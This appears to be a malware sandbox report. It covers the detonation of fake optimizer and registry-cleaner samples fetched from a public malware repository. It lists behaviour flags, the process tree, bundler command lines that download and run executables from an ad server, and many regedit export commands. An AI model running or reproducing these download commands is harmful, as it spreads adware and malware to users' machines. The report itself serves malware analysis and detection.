| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\AdvancedSystemOptimizer.7z:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\RegistryCleaner.7z:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\CPURocket.7z:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Runs .reg file with regedit
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | N/A | N/A |
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eedb6394-5950-4d89-a565-572d2fb75f3f} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2376 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a7d5423-5914-446b-843b-b3c2ea8dad02} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 1 -isForBrowser -prefsHandle 3240 -prefMapHandle 3248 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {90fc16bd-e58c-4f03-bf7d-2ec01c7d469f} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2704 -childID 2 -isForBrowser -prefsHandle 3620 -prefMapHandle 3616 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5b70ebf-9f18-4373-870c-65b2d8e3d05b} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4240 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4244 -prefMapHandle 4264 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc10bd96-f782-44ed-b14d-d6a4d758add2} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 3 -isForBrowser -prefsHandle 5380 -prefMapHandle 5372 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3e14987-5542-4569-965a-3d3ca3298278} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5540 -childID 4 -isForBrowser -prefsHandle 5548 -prefMapHandle 5552 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d61802db-1661-4c5e-a010-ada9c89200c7} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5740 -childID 5 -isForBrowser -prefsHandle 5752 -prefMapHandle 5756 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed30a662-82b9-43bd-8cd4-bce958dfcb75} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7064 -childID 6 -isForBrowser -prefsHandle 6920 -prefMapHandle 6936 -prefsLen 33996 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6074eeeb-6084-463d-8410-36421699e55c} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5752 -childID 7 -isForBrowser -prefsHandle 6616 -prefMapHandle 6604 -prefsLen 31021 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35808e43-a6e6-4de2-9d3a-8470971cf285} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5416 -childID 8 -isForBrowser -prefsHandle 6092 -prefMapHandle 6080 -prefsLen 31021 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {070ebd82-bc8a-48c3-bf26-a7fbf1f613ad} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Users\Admin\Downloads\7z2407-x64.exe
"C:\Users\Admin\Downloads\7z2407-x64.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\AdvancedSystemOptimizer.7z"
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp" /SL4 $C024C C:\Users\Admin\Desktop\[email protected] 9172173 50688
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\RegistryCleaner.7z"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5948 -childID 9 -isForBrowser -prefsHandle 4384 -prefMapHandle 5748 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81341aee-5c92-441a-915f-900107782e84} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3592 -childID 10 -isForBrowser -prefsHandle 4256 -prefMapHandle 6076 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2a6353d-03f5-42a3-913a-90a8926a844e} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6096 -childID 11 -isForBrowser -prefsHandle 7252 -prefMapHandle 7248 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82738c68-a38c-47e9-bff4-e47df3b66032} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp
C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp 4736 C:\Users\Admin\Desktop\ENDERM~3.EXE
C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp
"C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp" C:\Program Files (x86)\Registry Cleaner Trial\AffCreatorDLL.dll
C:\PROGRA~2\SOFTWA~1\soproc.exe
"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job regclean -action useraccept
C:\PROGRA~2\SOFTWA~1\soproc.exe
"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job soalert -action useraccept
C:\PROGRA~2\SOFTWA~1\soproc.exe
"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soalertdnld -proc sostreamer -pack SoRefRegSoAlertWxLiteNnAj -job soalert -url http://adserver.sharewareonline.com/bundle/soalert.exe -cmd {-setup} -longslowpace y
C:\PROGRA~2\SOFTWA~1\soproc.exe
"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job weatherbug -action userreject
C:\PROGRA~2\SOFTWA~1\soproc.exe
"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job newdotnet -action useraccept
C:\PROGRA~2\SOFTWA~1\soproc.exe
"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu sostreamer -proc sostreamer -pack SoRefRegSoAlertWxLiteNnAj -job newdotnet -url http://adserver.sharewareonline.com/bundle/nn.exe -target C:\Users\Admin\AppData\Local\Temp\NNCPUR638.exe
C:\PROGRA~2\SOFTWA~1\soproc.exe
"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job askjeeves -action useraccept
C:\PROGRA~2\SOFTWA~1\soproc.exe
"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu sostreamer -proc sostreamer -pack SoRefRegSoAlertWxLiteNnAj -job askjeeves -url http://adserver.sharewareonline.com/bundle/aj.exe -verif y
C:\PROGRA~2\REGIST~1\RegClean.exe
"C:\PROGRA~2\REGIST~1\RegClean.exe"
C:\Users\Admin\Desktop\Endermanch@RegistryCleaner_SOReferral.exe
"C:\Users\Admin\Desktop\Endermanch@RegistryCleaner_SOReferral.exe"
C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp
C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp 4736 C:\Users\Admin\Desktop\ENC9FB~1.EXE
C:\PROGRA~2\REGIST~1\RegClean.exe
"C:\PROGRA~2\REGIST~1\RegClean.exe"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\CPURocket.7z"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\CPURocket.7z"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x000000000000044C 0x00000000000004CC
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\Desktop\[email protected]
"C:\Users\Admin\Desktop\[email protected]"
C:\Users\Admin\Desktop\Endermanch@CPURocket_Adm.exe
"C:\Users\Admin\Desktop\Endermanch@CPURocket_Adm.exe"
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\SysWOW64\regedit.exe
/e "1.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "2.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "3.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "4.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "5.reg" "HKEY_CLASSES_ROOT\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "6.reg" "HKEY_CLASSES_ROOT\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "7.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "8.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EE-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "9.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EE-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "10.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EE-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "11.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EF-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "12.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "13.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EF-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "14.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EF-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "15.reg" "HKEY_CLASSES_ROOT\Interface\{A98639A1-CB0C-4A5C-A511-96547F752ACD}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "16.reg" "HKEY_CLASSES_ROOT\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "17.reg" "HKEY_CLASSES_ROOT\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "18.reg" "HKEY_CLASSES_ROOT\Interface\{ABFA087C-F703-4D53-946E-37FF82B2C994}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "19.reg" "HKEY_CLASSES_ROOT\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "20.reg" "HKEY_CLASSES_ROOT\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "21.reg" "HKEY_CLASSES_ROOT\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "22.reg" "HKEY_CLASSES_ROOT\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "23.reg" "HKEY_CLASSES_ROOT\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "24.reg" "HKEY_CLASSES_ROOT\Interface\{9E0BD17B-2D3C-4656-B94D-03084F3FD9D4}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "25.reg" "HKEY_CLASSES_ROOT\Interface\{A4C466B8-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "26.reg" "HKEY_CLASSES_ROOT\Interface\{A4C46780-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "27.reg" "HKEY_CLASSES_ROOT\Interface\{A4C46780-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "28.reg" "HKEY_CLASSES_ROOT\Interface\{A4C466B8-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "29.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3ED-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "30.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E7-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "31.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E7-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "32.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E6-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "33.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E7-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "34.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E8-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "35.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E8-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "36.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E8-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "37.reg" "HKEY_CLASSES_ROOT\Interface\{91C7765F-ED57-49AD-8B01-DC24816A5294}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "38.reg" "HKEY_CLASSES_ROOT\Interface\{919AA22C-B9AD-11D3-8D59-0050048384E3}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "39.reg" "HKEY_CLASSES_ROOT\Interface\{8E8304B8-CBD1-44F8-B0E8-89C625B2002E}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "40.reg" "HKEY_CLASSES_ROOT\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "41.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E6-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "42.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E6-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "43.reg" "HKEY_CLASSES_ROOT\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "44.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EC-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "45.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EB-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "46.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EB-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "47.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EC-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "48.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3ED-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "49.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3ED-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "50.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EC-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "51.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E9-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "52.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E9-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "53.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E9-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "54.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EA-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "55.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EB-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "56.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EA-4981-101B-9CA8-9240CE2738AE}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "57.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EA-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "58.reg" "HKEY_CLASSES_ROOT\Interface\{C5B6042B-FD21-404A-A0EF-E2FBB52B9080}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "59.reg" "HKEY_CLASSES_ROOT\Interface\{C52D32DD-F2B4-4052-8502-EC4305ECB71F}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "60.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F2-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "61.reg" "HKEY_CLASSES_ROOT\Interface\{C9590FA7-2132-47FB-9A78-AF0BF19AF4E6}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "62.reg" "HKEY_CLASSES_ROOT\Interface\{CBB76011-C508-11D1-A3E3-00A0C90AEA82}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "63.reg" "HKEY_CLASSES_ROOT\Interface\{CBB76011-C508-11D1-A3E3-00A0C90AEA82}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "64.reg" "HKEY_CLASSES_ROOT\Interface\{C987A3FC-A6E7-4ED2-AED8-A08C3E1CC6DE}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "65.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F0-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "66.reg" "HKEY_CLASSES_ROOT\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "67.reg" "HKEY_CLASSES_ROOT\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "68.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F0-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "69.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F2-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "70.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F1-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "71.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F1-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "72.reg" "HKEY_CLASSES_ROOT\Interface\{D7FA6F5E-9122-4900-8846-5AB0A5499D52}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "73.reg" "HKEY_CLASSES_ROOT\Interface\{D7FA6F5E-9122-4900-8846-5AB0A5499D52}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "74.reg" "HKEY_CLASSES_ROOT\Interface\{D4E0F020-720A-11CF-8136-00AA00C14959}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "75.reg" "HKEY_CLASSES_ROOT\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "76.reg" "HKEY_CLASSES_ROOT\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "77.reg" "HKEY_CLASSES_ROOT\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "78.reg" "HKEY_CLASSES_ROOT\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "79.reg" "HKEY_CLASSES_ROOT\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "80.reg" "HKEY_CLASSES_ROOT\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
